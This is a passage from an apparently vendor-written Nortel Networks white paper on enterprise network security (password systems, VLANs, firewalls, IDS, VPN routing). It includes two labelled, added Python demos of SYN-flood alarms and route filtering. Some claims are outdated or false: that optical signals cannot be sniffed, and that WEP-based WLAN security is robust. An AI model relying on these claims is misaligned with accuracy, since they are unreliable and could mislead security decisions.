which tend to be static and weak.
• Use a centralized authorization system, tightly coupled with the authentication system, with appropriate granularity for the
enterprise.
• Enforce strong, complex rules for all passwords.
• Securely store all passwords in one-way encrypted (hashed) format.
• Maintain simplicity to the extent appropriate, for maximum ease of use, ease of administration, and compliance.
• Securely log authentication and authorization events for audit purposes.

Figure 8. Secure authentication and authorization reference model
[Figure: local wired PC access, WLAN IP-VPN users, remote IP-VPN users, and remote IP-VPN offices reach the enterprise
network over the Internet through a Secure IP Services Gateway (FW, IPsec, SRT, Auth); a centralized, RADIUS-based
authentication server consults a Level 1 password authentication database, a Level 2 token authentication database, and a
Level 3 biometric authentication database; an application server with centralized authentication, plus DHCP and DNS servers,
sit on the enterprise network.]
A case example: “Single Strong Password” in the Nortel Networks corporate network
Nortel Networks uses a “Single Strong Password” approach in its own worldwide network to authenticate internal and external
users, from employees and contractors to joint venture representatives and even customers. The user has one very strong
password that is maintained on a centralized password system and synchronized with applications and systems across the
enterprise. Users only have to remember one password, making the system simple to use and not likely to be bypassed.

Dedicated password servers on several continents manage the system and provide Web-based password management for users
and security administrators. These password servers communicate directly with RADIUS authentication servers. The system
automatically synchronizes passwords across multiple systems and platforms, such as Windows networking, remote access,
UNIX, purchasing, and niche business applications.

The system enables fine-grained authorization at the application level. An internally developed tool enables applications to
access the Single Strong Password system, and a list of users allowed to access each application is stored in the authorization
database. When an application is accessed, the Single Strong Password system authenticates the user and returns authorization
information. The system logs attempted violations of authorization rules and multiple simultaneous logins to geographically
dispersed systems, to detect and prevent misuse.

The Single Strong Password system enforces strict password rules. For example, passwords must contain at least eight
characters, both upper and lowercase letters, and at least one number or symbol. Additionally, passwords must not contain
dictionary words of four characters or longer, a date or year, keyboard patterns, or repeating characters, and must not be a
previously used password or match an account name. Users are required to change passwords at predefined intervals.

After years of real-world use, Nortel Networks has seen the following advantages of this system:

• Single consistent method for setting passwords
• Single consistent method for authentication and authorization
• Single method for registering and terminating user accounts
• Enforcement of corporate password strength guidelines
• Consistency across applications, so employees know what to do
• Standardization that makes the system easy to support and adopt
• Fast, seamless performance through standard interface and APIs
• Lower costs, fewer help desk calls

Figure 9. Single password access management in Nortel Networks corporate network
[Figure: local, remote, wired, and wireless access for employees, technicians, contractors, partners, and customers enters the
enterprise network; a RADIUS server backed by a password authentication database provides single password management for
RADIUS-enabled enterprise applications: CRM, SCM, ERP, unified messaging, self-serve benefits, expense system ...]
Part III. Network security in the real world
The previous section outlined key principles and practices of the Nortel Networks Unified Security Architecture.
This section demonstrates this multi-level security framework in action for several real-world scenarios:

• Securing the campus network
• Securing the data center
• Securing the remote office
• Securing remote access
• Securing IP telephony services

3.1. Securing the campus network


In this context, the term “campus” describes a corporate headquarters or large regional office where the network uses a mix
of technologies, products, and applications, and serves a large user population. The campus network presents a challenging
security picture because of the diversity of elements to protect:

• Servers, including departmental servers for user access and file sharing, central application servers such as finance and
databases, and Web servers for either public Web or Intranet applications.
• Operating systems, typically multiple versions of multiple operating systems running on servers and clients.
• Network devices, including routers, Layer 4-7 load-balancing switches, Layer 3 core switches, Layer 2 distribution
switches, and wireless LAN access points.
• Security devices, such as firewalls, VPN gateways, intrusion-detection and anti-virus servers, SSL accelerators,
authentication servers, and content filtering servers.

Securing the campus network at the “network security level”


Layer 2 switching security. VLANs based on the IEEE 802.1Q standard and Ethernet switches segregate traffic for greater
security and manageability. When port-based VLANs are configured, each VLAN is completely separated from the others—
particularly those in the broadcast domain. In order to limit network access, a number of Ethernet switches provide port
security, which ties a MAC address list to specific switches or even to ports of those switches and prevents “unknown”
workstations from getting access. This list may be built either by auto-discovery or by manual update.

With the general availability of the 802.1x authentication standard, Ethernet switches offer embedded capabilities to apply
security at every node in the network, providing an effective framework for authenticating and controlling user traffic to a
protected network. 802.1x ties a protocol called EAP (Extensible Authentication Protocol, originally developed for PPP) to
LAN media and supports multiple authentication methods, such as token cards, Kerberos, one-time passwords, certificates,
and public key authentication. It enables enforcement of client authorization on corporate authentication servers like RADIUS.

EAP not only controls Layer 2 port connectivity, but can be extended (as is being done by Nortel Networks) along with secure
access management to customize the security (and QoS) end-user profiles of the port for a particular authenticated user. When
a host attempts to log onto the network, the host and an authentication service exchange data via EAP. Under an end-user
profile architecture, the EAP protocol enables the policy server to leverage information in a third-party authentication service
to validate users and assign appropriate network access and QoS (Quality of Service) capabilities.

Layer 2 wireless LAN security. Wireless LANs offer a flexible alternative to regular Ethernet connectivity, but they suffer from
known vulnerabilities. For one, it’s hard to control who is really accessing the system. Second, the current Wired Equivalent
Privacy (WEP) 802.11 encryption method is weak.

Figure 10. Securing the campus network
[Figure: campus departments (Engineering, Human Resources, Finance) and an IP PBX with PSTN access connect through
Layer 2 distribution switches to a Layer 2-7 Enterprise Routing Switch with Web Switching on the backbone; campus servers,
a virus screening server, content filtering, and load-balanced IDS servers sit behind it; the Internet edge consists of a Layer 2-7
Switched Firewall (NAT, FW), a high-capacity router, SSL, and an IP-VPN Secure IP Services Gateway (Auth, SRT, IPsec, FW)
serving WLAN PCs.]

For both reasons, it is recommended to use VPN technology for wireless LANs and run an IP-VPN client, such as Nortel
Networks Contivity Client, on the wireless device. VPN-based wireless security is platform and radio technology agnostic—
that is, the client system establishes a connection to the network via 802.11b, 802.11a, or even Bluetooth, and the VPN takes
over from there. Most of the authentication takes place independently of the wireless network, keeping access point
maintenance simple. The VPN can treat the wireless LAN just like the corporate backbone with wireless access points. Users trying to
access the network via the wireless LAN would then be authenticated, their information encrypted, and all communication
logged by the VPN system.

Alternatively, with some WLAN IP phones, encryption and authentication are built in. For example, Nortel Networks has a
strategic partnership with Symbol, whose WLAN IP phones support 128-bit WEP encryption between the client and the
wireless access point, and Kerberos authentication. Combining those approaches provides robust user authentication and
encryption required for WLAN environments.

Layer 3 switching and routing security. Network address translation (NAT) enables an organization to present a public IP
address to the world and hide internal addresses from public view. Processing NAT in hardware with a switch is an innovative
strategy for converting internal addresses into public addresses (and vice versa), making routing and firewall solutions highly
efficient.

Proper design and use of routing and Layer 3 switching enhance the survivability of the campus network. Access control lists,
IP segmentation and sub-netting, redundancy protocols such as Virtual Router Redundancy Protocol (VRRP), and fast
convergence routing using OSPF (Open Shortest Path First) all contribute to a more survivable infrastructure.

Routers and routing switches secure the data path using IP filters that drop undesirable packets. Routing can be further
secured by implementing route policies, encryption and authentication of OSPF and BGP route updates with MD5, and
broadcast/multicast rate limiting.

Last but not least is the innovative Secure Routing Technology (SRT), which enables dynamic routing over secure IPsec tunnels
for RIP and OSPF. Contivity Secure IP Services Gateways implement this dynamic secure routing approach, which is
described later in this document in the “Securing Remote Access” scenario.

Securing remote communication via IPsec VPNs and SSL extranets. Typically, the campus network also supports VPNs to
connect with branch offices and remote users—carrying private network traffic within a secure, encrypted “tunnel” carried over
a public network. Robust and secure central site solutions that support both remote access and remote office IP-VPNs and
firewalls are key elements of the campus network. For more information, see “Securing the Remote Office” and “Securing Remote
Access,” later in this section.

Securing the campus network at the “network-assisted security level”


Perimeter control via firewalls and intrusion-detection servers. The enterprise network often provides employees with
connection to the Internet from the corporate headquarters campus. It is usually centralized in order to more easily protect a
single interface to the public world. That’s exactly where perimeter control solutions such as firewalls and intrusion-detection
systems (IDSs) are generally deployed to prevent malicious intrusion by unauthorized persons.

It is highly recommended that firewalls be implemented at every site within an enterprise to secure internal and external traffic,
and at every point of interconnection with the Internet (e.g. even a remote PC). In some cases, it is appropriate to integrate
this functionality with secure IP services gateways used also for remote office and remote access IP-VPNs.

Firewalls provide a perimeter defense against unauthorized access—an essential first step when planning for Internet access.
Firewalls come in various sizes and capabilities, fitting many specific network requirements depending on their point of use.
An emerging trend is to use new, multi-gigabit firewalls to interconnect segments of the campus LAN, which keeps
departments separate and enables communication only through firewall security policies.

An IDS monitors the network to identify unauthorized users or suspicious patterns of utilization. Most IDS applications
compare network traffic and host log entries to match data signatures and host address profiles indicative of hackers.
Intrusion-detection software identifies traffic patterns that indicate the presence of unauthorized users. Suspicious activities
trigger administrator alarms and other configurable responses. Nortel Networks partners with best-of-breed companies such
as Internet Security Systems (ISS) to offer specialty software solutions for intrusion-detection.

Content inspection via content filtering and anti-virus systems. These tools provide essential protections for remote and
local computing, and are discussed in more detail in Part III under “Securing the Data Center.”

Layer 4 to 7 switching and filtering security. Layer 4 to 7 switches provide application, management, and traffic control
services that improve resource utilization and performance, ensure security without sacrificing performance, provide network
scalability, and provide failsafe network assurance. They are usually deployed near security devices and in server farms.
Integrated security filtering offloads NAT processing from firewalls, monitors network activity, protects against denial-of-service
attacks and some virus types such as Code Red / Blue, and protects data without compromising throughput. Nortel Networks
Passport 8600 and Nortel Networks Alteon Web switches offer extensive Layer 4 to 7 capabilities.

These solutions are more generally implemented in the data center, but have value in front of campus servers:
• Load-balancing. Firewalls and VPNs are compute-intensive applications and can become bottlenecks to network
performance. Load-balancing using an application switch mitigates this problem by distributing traffic among multiple active
devices, enabling many firewalls/VPNs to operate in parallel.
• Port mirroring. Similarly, IDS functions are extremely compute-intensive and can slow network performance. Port
mirroring on an application switch duplicates the data and sends it to one or more intrusion-detection servers (which
can be load-balanced) for packet inspection at the same time the original data flow is being forwarded without delay.
In small campus networks, these capabilities can be provided by Alteon Web switches. In large campus networks, a
Nortel Networks Passport 8600 system with integrated Alteon Web Switching Module provides the required scalability.

3.2. Securing the data center


The typical enterprise data center supports mission-critical applications and houses a high concentration of capital-intensive
resources and confidential data—all connected to the inherently insecure Internet as well as internal users. That means securing
the data center presents some unique requirements for failsafe security without compromising performance and availability for
users. The need increases as enterprises discover new ways to exploit high-performance, Internet-empowered data centers:

• Ensure business continuity. Massive processing throughput and transport bandwidth now make it feasible to store
primary and duplicate sets of critical data in multiple data centers, in real time—to extend business continuity services,
real-time storage mirroring, and live backup across service provider networks.
• Support critical business applications. Enterprises use data centers to host business applications, implement firewalls or
virtual private networks, provide storage services and content delivery of static and streaming media, and more.
• Produce economies of scale on infrastructure. Enterprises can consolidate or outsource data center functions, to
centralize critical computing resources, create virtual data centers that span multiple locations, and reduce operational costs
without the performance penalty or security concerns typically associated with remote access.
The “closed” enterprise may outsource its Web presence to a third party, but “extended” and “open” enterprises are exposed to
the Internet for customer access, business-to-business connectivity, and interworking with application service providers, disaster
recovery providers, and more. There’s a big survival risk for companies that don’t Web-connect with extended communities—
yet there’s a big security risk for those that do.

A comprehensive data center security strategy requires multiple, inter-working technologies, protocols, and procedures—
with partitioning among these functions provided by VLANs and firewalls.

Securing the data center at the “network security level”


Virtual Private Networks. It is highly recommended that firewalls be implemented at every site within an enterprise to secure
internal and external traffic, and at every point of interconnection with the Internet (e.g. even a remote PC). In some cases,
it is appropriate to integrate this functionality with Secure IP Services Gateways used also for remote office and remote access
IP-VPNs. IP-VPNs enable enterprises to enjoy secure connectivity with branch offices, business partners, and remote users. For
employee access, the central site VPN solution can be implemented at the campus edge; for partner and business-to-business
connectivity, the VPN can be implemented in the data center, or the two can be integrated. The ideal VPN gateway should
provide an all-in-one solution for routing, bandwidth management, authentication, encryption, network address translation,
data integrity, logging, and firewall capabilities. Nortel Networks market-leading Contivity Secure IP Services Gateways (built
on Secure Routing Technology—SRT) meet these requirements.

Network address translation (NAT) enables the enterprise data center to present a public IP address to the world and hide
internal server addresses from public view. Converting external to internal addresses (and vice versa) can be performed in
switch hardware, thereby enhancing the efficiency of routing, switching, and firewall functions.

Figure 11. Securing the data center
[Figure: mission-critical and other enterprise applications sit behind Layer 2 switches and a Layer 2-7 Routing Switch with
Web Switching on the backbone; a DMZ holds SSL Web servers; a virus screening server and content filtering protect the
applications; a switched firewall (NAT, FW), a high-capacity router, and SSL form the Internet edge, alongside an IP-VPN
Secure IP Services Gateway (Auth, SRT, IPsec, FW); a management domain contains LDAP, RADIUS, DNS, and load-balanced
IDS servers.]

Securing the data center at the “network-assisted security level”


Switched firewalls can now provide multi-gigabit throughput and state-of-the-art filtering to secure and safeguard data center
servers without the performance degradation that typically occurs with deep packet inspection. Switched firewalling introduced
the same level of performance improvements to perimeter security as Layer 3 switching brought to LAN routing. Therefore,
a switch-based firewall is recommended for perimeter security in transaction-oriented environments. The Nortel Networks
Alteon Switched Firewall combines Layer 4-7 cut-through switching with firewall software processing to deliver more than
4 Gbps throughput. Logical “demilitarized zones” can be created through the use of VLANs.

Secure Sockets Layer (SSL) protocol—built into most browsers and Web servers—is widely used to protect communications
to and from Web applications. Unfortunately, SSL processing is very compute-intensive and significantly reduces server
performance. This results in increased cost and operational complexity when it comes time to scale secure transaction
processing. SSL Accelerators—such as Nortel Networks Alteon solution—offload SSL processing from local servers without
imposing delays on other traffic in the same data path, and offer a simpler way to deploy and maintain the Public Key
Infrastructure (PKI) required for electronic transactions.

Intrusion-detection, anti-virus, and content filtering tools provide essential protections for online commerce and remote
computing in general. IDS software identifies traffic patterns that indicate the presence of unauthorized users. Anti-virus
software detects and defuses potential cyber attacks. Content filtering software restricts the type of data that can be accessed
or distributed.

IDSs can be broadly categorized according to the following criteria:

• Incident detection timeframe—real-time or off-line, depending on whether system logs and network traffic are analyzed
as events take place or in batch mode during off hours.
• Type of installation—network-based or host-based. A network-based IDS typically involves multiple monitors
(often pre-configured appliances) installed at choke points on the network (where all traffic between two points can be
monitored). A host-based IDS requires that software be installed directly on the servers to be protected, and monitors
the network connections and user activity on those servers.
• Type of reaction to incidents—whether the IDS actively intervenes to head off attacks (such as by modifying firewall
rules or router filters) or simply notifies staff or other network systems of the problem.
Most commercial IDS products provide a combination of network- and host-based monitoring capabilities, with a central
management host to receive reports from the various monitors and alert network support staff. A network-based IDS is
recommended for most installations.

Anti-virus solutions continuously monitor applications to ensure that no virus damages the system. They detect malicious
viruses, worms, and Trojan horses in all major file types, including mobile code and compressed file formats.

Content filtering software restricts the type of data that can be accessed or distributed to expose employees and partners only
to correct and appropriate content. Content filtering can identify inappropriate Web ‘surfing’ and stem productivity losses due
to prolonged Internet use. Content filtering also helps minimize the spread of viruses from Web servers. The Alteon Content
Cache (ACC) supports hundreds of URL filters providing customers with the ability to protect themselves from well-known
URL server attacks. ACC also stops many viruses like NIMDA and Code Red, and can be used to control which sites are
accessible.

Together, these measures enable networks to be open and accessible for legitimate uses, but not wide open for inappropriate
or malicious uses.

Layer 4 to 7 application switching provides high-availability traffic management by filtering and switching traffic based on
application and content information, without compromising throughput. To increase protection against denial-of-service
(DoS) attacks such as SYN floods, routing switches such as Nortel Networks Passport 8600 enable network administrators
to set a threshold for new half-open sessions and have the Layer 4-7 switch trigger a trap (a SYN attack alarm) to notify the
administrator when the threshold is exceeded.

A “protection from application abuse” feature limits the rate of new TCP connections on a per-client basis. Administrators can
limit users to a particular connection rate and limit the number of sessions for users accessing a specific domain or application
within the domain. Benefits include protection from application abuse, increased application availability, and increased control
of user access to applications. Layer 7 Deny Filters allow network administrators to create filters and assign URLs to those
filters to deny certain traffic. This is particularly useful for added anti-virus protection for preventing access to disallowed
Web content.
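An added example (not Nortel’s or the Passport 8600’s code) that models the two protections just described: a half-open session threshold that raises one trap per server when crossed, and a per-client new-connection rate limit that drops excess SYNs. The threshold, rate limit, window, and the connection-event format are assumptions.

```python
# Added example (not Nortel code): replay of a constructed TCP connection-event stream
# through a half-open session threshold and a per-client new-connection rate limit.
# The threshold, rate limit, window and event format are assumptions, not switch settings.
from collections import defaultdict, deque

HALF_OPEN_THRESHOLD = 3     # trap when a server's half-open (SYN-only) sessions exceed this
CLIENT_RATE_LIMIT = 4       # max admitted new connections per client per window
RATE_WINDOW_SEC = 1.0

# Constructed events: (time_s, conn_id, client_ip, server, event). 192.0.2.9 sends SYNs
# to "web" that never complete the handshake; the other clients behave normally.
EVENTS = [
    (0.0, 1, "10.0.0.5", "web", "SYN"),
    (0.1, 1, "10.0.0.5", "web", "ESTABLISHED"),
    (0.5, 2, "10.0.0.7", "web", "SYN"),
    (0.6, 2, "10.0.0.7", "web", "ESTABLISHED"),
    (1.0, 3, "192.0.2.9", "web", "SYN"),
    (1.1, 4, "192.0.2.9", "web", "SYN"),
    (1.2, 5, "192.0.2.9", "web", "SYN"),
    (1.3, 6, "192.0.2.9", "web", "SYN"),
    (1.4, 7, "192.0.2.9", "web", "SYN"),
    (2.0, 8, "10.0.0.5", "mail", "SYN"),
    (2.1, 8, "10.0.0.5", "mail", "ESTABLISHED"),
]


def analyse(events, half_open_threshold=HALF_OPEN_THRESHOLD,
            client_rate_limit=CLIENT_RATE_LIMIT, window=RATE_WINDOW_SEC):
    """Replay events in order; return the alarms raised, the connection ids dropped by
    the rate limit, and the half-open count per server at the end of the replay."""
    half_open = defaultdict(set)      # server -> conn_ids that sent SYN but never completed
    recent = defaultdict(deque)       # client -> timestamps of admitted SYNs in the window
    alarms, dropped = [], []
    for t, conn_id, client, server, event in events:
        if event == "SYN":
            q = recent[client]
            while q and t - q[0] > window:          # slide the per-client window forward
                q.popleft()
            if len(q) >= client_rate_limit:         # "protection from application abuse"
                dropped.append(conn_id)
                alarms.append((t, "rate_limited", client))
                continue                            # SYN dropped: never becomes half-open
            q.append(t)
            half_open[server].add(conn_id)
            if len(half_open[server]) == half_open_threshold + 1:   # crossing -> one trap
                alarms.append((t, "half_open_threshold", server))
        else:                                       # ESTABLISHED or CLOSED: no longer half-open
            half_open[server].discard(conn_id)
    return {
        "alarms": alarms,
        "dropped": dropped,
        "half_open": {s: len(ids) for s, ids in half_open.items() if ids},
    }


if __name__ == "__main__":
    for alarm in analyse(EVENTS)["alarms"]:
        print("t=%.1f %-20s %s" % alarm)
```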

Alteon Web switches and Passport 8600 systems equipped with an Alteon Web Switching Module both offer high-performance
Layer 2-7 filtering. These systems also perform load balancing to eliminate data center performance bottlenecks in VPN,
firewall, IDS, and DNS systems.

Securing data center storage
When enterprises were organized into business silos—each running their own applications and databases—direct
attached storage (DAS) was sufficient. Storage devices were dedicated and physically attached to each server; securing
them was relatively simple.

With the emergence of storage area networks (SANs) to support global applications more cost-effectively, the security
picture becomes more complex. SANs connect a number of storage devices and application servers across a dedicated
network running protocols such as Fibre Channel, ESCON, and FICON at speeds up to 2 Gbps. Optical systems—
such as Nortel Networks OPTera Coarse/Dense Wave Division Multiplexing (CWDM/DWDM) system—have
enabled massively scalable SANs that span the MAN and WAN.

As SANs are extended globally, storage security becomes a significant concern. Within the data center, storage access is
protected within the SAN by creating zones of trust. As storage is extended on CWDM/DWDM optics, carrier-grade
connectivity and security is required (and provided by Nortel Networks solutions). Optical connectivity solutions are
inherently secure since the sniffing of an optical signal is not possible and the network elements do not operate in the
IP data plane. The optical storage data is a completely private and secure optical signal.

Within the network core, carrier-grade network elements are required that are hardened against IP-based attack. The
management plane of the optical network elements used by enterprises (and forming the core of service provider and carrier
networks) for transporting storage, video, voice, and data is secured through the management-security techniques described
in this document. In contrast, running storage over the enterprise IP network (as with iSCSI) exposes this critical resource
to the broad range of IP-level vulnerabilities discussed throughout this paper.

3.3 Securing the remote office

In this context, the term “remote office” refers to any remote workplace that requires persistent, two-way communication with
the enterprise—for locations as diverse as a telecommuter’s home office or a major regional office. Connecting remote offices
is a significant network cost in many industries, such as retail banking, health care, and government.

Traditionally, remote offices were connected to the enterprise network using various LAN technologies and multi-protocol
routers, working into frame relay networks with ISDN circuit-switched backup. VSAT satellite terminals have also been widely
deployed—for instance, for credit card validation in the retail industry. Four major developments are transforming the remote-
office networking scenario: (1) the convergence on Ethernet as the LAN standard, (2) universal acceptance of IP as the
protocol of choice, (3) the Internet, and (4) a growing list of Layer 2 and 3 VPN services. However, these developments also
introduce a variety of security challenges, particularly for “extended” and “open” enterprises.

WAN (wide area network) edge requirements at the branch office level include routing between VLANs locally and into the
network, QoS and bandwidth management, and scalable interfacing into the WAN. This includes supporting the required
encapsulation scheme over the WAN and whatever level of reliability is appropriate. Cost-effective security over the Internet
(and even over frame relay) is a key requirement. Managing the transition from legacy (relatively secure) WAN technologies
to IP-VPNs is also a challenge. Some enterprises want to have direct Internet access from every remote office, which creates
the need for a firewall at each remote office.

Others want highly reliable, dynamically routed connectivity between branches and the enterprise backbone, with centralized
firewalls into the Internet, in some cases using frame relay as the primary path and the Internet as a backup—or moving
towards IP-VPNs as a primary configuration. Dynamic routing enhances scalability and reliability by automatically learning
network topology and end-user addresses, and adapting to changes in network topology.

However, security in routed networks has been an afterthought. For example, there has been no effective way to run dynamic
routing over VPN-encrypted tunnels, which themselves have been difficult to manage.

These limitations have led enterprises to buy, install, maintain, and manage multiple security and networking devices for
remote office and branch networks, resulting in a complex and costly architecture.
Dynamic routing vulnerabilities
Although dynamic exchange of routing information among enterprise sites eases the administrative tasks of managing
network traffic flows and can enhance reliability, it can also introduce security issues if not configured and managed
properly.

One key issue is the handling of default routes, which determine where traffic with unknown destination addresses
will be sent. Typically, the default route points to the Internet. In this case, if routing information for some site in the
enterprise is lost (perhaps due to equipment failure, but possibly due to a security attack), then traffic meant for that
site may be sent into the Internet, without security protection. If the missing route is actually reachable through the
Internet (e.g., if it is advertised by an Internet gateway at the remote office), then full bi-directional communication
might be established, with traffic flowing unprotected across the Internet—all unknown to the systems involved in the
communication.

Another issue with dynamic routing is the problem of misleading routing information. If one routing system is
hijacked, or if a workstation in the network is configured to send false routing messages, an attacker could redirect
traffic to a point where it can be compromised. Likewise, a misconfigured router at a remote office can advertise incorrect
routing information and disrupt communications, even if no malicious intent or traffic interception is involved.
An example is when one remote office routing system is configured with a static route for another site, then advertises
this route as if it were located at that site. This can disrupt traffic actually intended for the other site.

The solution for these routing issues is to ensure that gateway systems for remote offices contain effective route
filtering capabilities, so they will not blindly exchange any routing information they receive from the internal
network, but will apply explicit rules to it: for example, accept from each branch only the prefixes assigned to that branch,
and never accept a default route from an internal neighbor. This strategy enables the enterprise network to benefit from the
manageability of dynamic routing without exposing the network to dynamic routing vulnerabilities. Routing information
received from the Internet should be carefully filtered, and internal enterprise routes should never be accepted from the
Internet.
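The route-table behaviour and the filter rules described in this sidebar, as an added worked example (Python; not code from the paper or from any Nortel product). The 10.0.0.0/8 addressing plan, site names and next-hop labels are assumptions, and the aggregate discard route in the second demo is a mitigation beyond what the sidebar itself states:

```python
# Added example (not from the Nortel paper): a toy route table plus the
# import-filter rules the sidebar describes. The addressing plan, site names
# and next-hop labels are assumptions chosen for illustration.
import ipaddress
from dataclasses import dataclass

net = ipaddress.IPv4Network


@dataclass(frozen=True)
class Route:
    prefix: ipaddress.IPv4Network
    next_hop: str       # e.g. "tunnel-branch-b", "internet", "discard"
    learned_from: str   # neighbour that advertised it: a site name, "internet" or "local"


class RouteTable:
    def __init__(self):
        self.routes = []

    def add(self, route):
        self.routes.append(route)

    def withdraw(self, prefix):
        self.routes = [r for r in self.routes if r.prefix != prefix]

    def lookup(self, dst):
        """Longest-prefix match; the default route (0.0.0.0/0) only wins when
        nothing more specific covers the destination."""
        addr = ipaddress.IPv4Address(dst)
        best = None
        for r in self.routes:
            if addr in r.prefix and (best is None or r.prefix.prefixlen > best.prefix.prefixlen):
                best = r
        return best.next_hop if best else None


# Assumed addressing plan: every internal site lives inside 10.0.0.0/8 and
# each branch owns exactly one /24 of it.
ENTERPRISE_AGGREGATE = net("10.0.0.0/8")
SITE_PREFIXES = {
    "branch-a": [net("10.1.0.0/24")],
    "branch-b": [net("10.2.0.0/24")],
}


def accept_route(route):
    """Import filter for a remote-office gateway. Rejects:
    (1) any internal prefix learned from the Internet peer,
    (2) a default route learned from an internal neighbour,
    (3) a branch advertising a prefix it does not own (the static-route
        misconfiguration described in the sidebar)."""
    if route.learned_from == "internet":
        return not route.prefix.subnet_of(ENTERPRISE_AGGREGATE)
    if route.prefix.prefixlen == 0:
        return False
    owned = SITE_PREFIXES.get(route.learned_from, [])
    return any(route.prefix.subnet_of(p) for p in owned)


def demo_default_route_leak():
    """The failure mode in the text: once the branch-b route is lost, traffic
    for 10.2.0.0/24 falls through to the default route and leaves in the clear."""
    rt = RouteTable()
    rt.add(Route(net("0.0.0.0/0"), "internet", "internet"))
    rt.add(Route(net("10.2.0.0/24"), "tunnel-branch-b", "branch-b"))
    before = rt.lookup("10.2.0.7")
    rt.withdraw(net("10.2.0.0/24"))
    after = rt.lookup("10.2.0.7")
    return before, after


def demo_with_aggregate_discard():
    """Mitigation (an addition beyond the sidebar): a locally installed discard
    route for the enterprise aggregate is more specific than the default, so a
    lost site route makes traffic drop instead of escaping to the Internet."""
    rt = RouteTable()
    rt.add(Route(net("0.0.0.0/0"), "internet", "internet"))
    rt.add(Route(ENTERPRISE_AGGREGATE, "discard", "local"))
    rt.add(Route(net("10.2.0.0/24"), "tunnel-branch-b", "branch-b"))
    before = rt.lookup("10.2.0.7")
    rt.withdraw(net("10.2.0.0/24"))
    after = rt.lookup("10.2.0.7")
    return before, after


def filter_examples():
    """Decisions of the import filter on constructed advertisements."""
    return {
        "internal prefix from the Internet": accept_route(Route(net("10.1.0.0/24"), "isp", "internet")),
        "branch-b claiming branch-a's prefix": accept_route(Route(net("10.1.0.0/24"), "tunnel-branch-b", "branch-b")),
        "branch-a advertising its own prefix": accept_route(Route(net("10.1.0.0/24"), "tunnel-branch-a", "branch-a")),
        "default route from a branch": accept_route(Route(net("0.0.0.0/0"), "tunnel-branch-a", "branch-a")),
        "default route from the Internet": accept_route(Route(net("0.0.0.0/0"), "isp", "internet")),
    }


if __name__ == "__main__":
    print(demo_default_route_leak())          # ('tunnel-branch-b', 'internet')
    print(demo_with_aggregate_discard())      # ('tunnel-branch-b', 'discard')
    for case, verdict in filter_examples().items():
        print(f"{'ACCEPT' if verdict else 'REJECT'}: {case}")
```

The discard route is the check a practitioner adds alongside the filter: filtering stops bad advertisements from being accepted, but only a covering route that is more specific than the default stops a legitimately withdrawn site route from turning into clear-text traffic to the Internet.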

With the move to IP-VPNs over the Internet, a complete set of security requirements has to be met as cost-effectively as
possible at multiple network levels:
• “Network security level” functions include IP routing over secure tunnels and VPNs
• “Network-assisted security level” functions include encryption and stateful firewall inspection
• “Application security level” functions must be provided if data servers and/or IP telephony are deployed at the remote office
• Access management provisions include remote-office authentication and directory services that give each user a single
security profile that stays with them whether they log in locally over the intranet or from home across the Internet
• Network management security provisions must be extended to the remote office, without back doors that might
compromise network security

Traditional solutions for secure remote office connections

Traditional solutions have proven problematic for meeting remote office security requirements. Many enterprises
considered turning on the requisite security functionality on their routers, only to find that adding security may not be
possible on low-end routers, or that it may degrade router performance and require an expensive upgrade costing up to
50 percent of the price of the original router.
Even if a router can be upgraded to support filtering, firewalls, and VPNs, treating security as an application on top of
monolithic routing code introduces other problems. One example is routing over IPsec tunnels, which is required to manage
redundant paths, route around failed nodes, and perform load balancing and on-the-fly route selection based on link
utilization. Today, these functions are done by double-encapsulating IP packets via Generic Routing Encapsulation
(GRE) on top of IPsec tunnels, which adds processing, memory, and transmission overhead (an extra 24 bytes per packet
for the GRE header and its outer IP header, before IPsec’s own overhead) and requires manual configuration of each tunnel
endpoint. The extra encapsulation also brings the well-known fragmentation problem: packets that fit the LAN MTU may no
longer fit the tunnel path MTU. If this is unacceptable to the customer, then the only practical option is manually configured
static routes, which are labor intensive, provide ineffective load balancing at best, and are awkward for managing changes.

Figure 12. Securing the remote office
(Diagram: a legacy branch with separate firewall, IPsec, authentication and RADIUS server elements, a PBX with PSTN
connection, and a Layer 2 switch; and a converged branch in which a single Secure IP Services Gateway provides SRT,
firewall, IPsec and authentication, fronting a Layer 2 switch, an IP telephony system, a RADIUS server and IP telephones.
Both branches reach the enterprise over the Internet; users authenticate with tokens or PKI.)

A new architecture for securing the remote office

Adding security to routers (see “Traditional Solutions” sidebar) is a sub-optimal solution that doesn’t measure up to the
mission-critical service delivery requirements of branch networks. Multi-box solutions raise total cost of ownership, a problem
that multiplies with the hundreds or thousands of sites that may need to be served.

A new approach uses secure IP services gateways, which are purpose-built devices that deliver security and security-related IP
services in a single, integrated platform designed for remote offices. A single hardware device provides bandwidth management
over a range of WAN services, dynamic IP routing over encrypted tunnels, IP-VPN support, and a range of security features,
including stateful firewall inspection, encryption, and authentication—all operating under directory and policy services.
Targeted at the enterprise edge—the intersection of an enterprise’s private and public IP networks—secure IP services gateways
provide secure communications over an inherently insecure medium, the Internet.

The Nortel Networks Contivity Secure IP Services Gateway is a new class of device in this area, and a key component of our
Unified Security Architecture. Contivity Secure IP Services Gateways:

• Run over ISDN, frame relay, IP-VPN and emerging Layer 2 VPN services (such as Optical Ethernet)
• Deliver encryption/authentication/firewall performance at wire-speed
• Operate under a unified security policy management architecture that covers remote users and sites across the enterprise
• Support dynamic end-to-end routing for a mix of frame relay virtual circuits, Layer 2 Virtual Private Ethernets, and IPsec
tunnels—the latter achieved by making tunnels visible to the routing code and by encapsulating routing messages directly
in IPsec (bypassing the GRE layer of today’s solutions)
• Centralize provisioning of critical IP services with tightly integrated security
• Interoperate with existing routing, authentication/directory, and security services

Figure 13. Remote office dynamic routing for increased reliability and scalability
(Diagram: redundant Secure IP Services Gateways (FW, IPsec, SRT) at the central site; remote access clients arriving over
the Internet; branch Secure IP Services Gateways (FW, IPsec, SRT, Auth) connected to the central site by static and dynamic
routing over secure frame relay or secure tunnels.)

Secure Routing Technology (SRT) features in Contivity systems

• Secure IP services applications decoupled from the hardware
• Software-configurable IP service deployment
• Designed for secure management, secure policy, secure access, and secure routing
• Compatible with existing Contivity VPN switches and Succession IP telephony

Policy Management
• Applied to frame relay, PPP connections, and secure tunnels

Secure Access Management
• Strong user authentication (PKI) services, with LDAP, RADIUS, digital certificates, smart cards, and user name/password

Network Security
• Dynamic routing of IP packets over encrypted tunnels
• NAT, PPP over Ethernet, DHCP server and client, DNS with VPN, and DNS Proxy

Network-assisted Security
• Full stateful firewall with 100 application gateways

Management Security
• Remotely managed using strong encryption (IPsec)
• Secure base configuration that denies all inbound Internet traffic by default and provides DoS protection
• Logging and protection against hacker attacks

3.4 Securing remote access
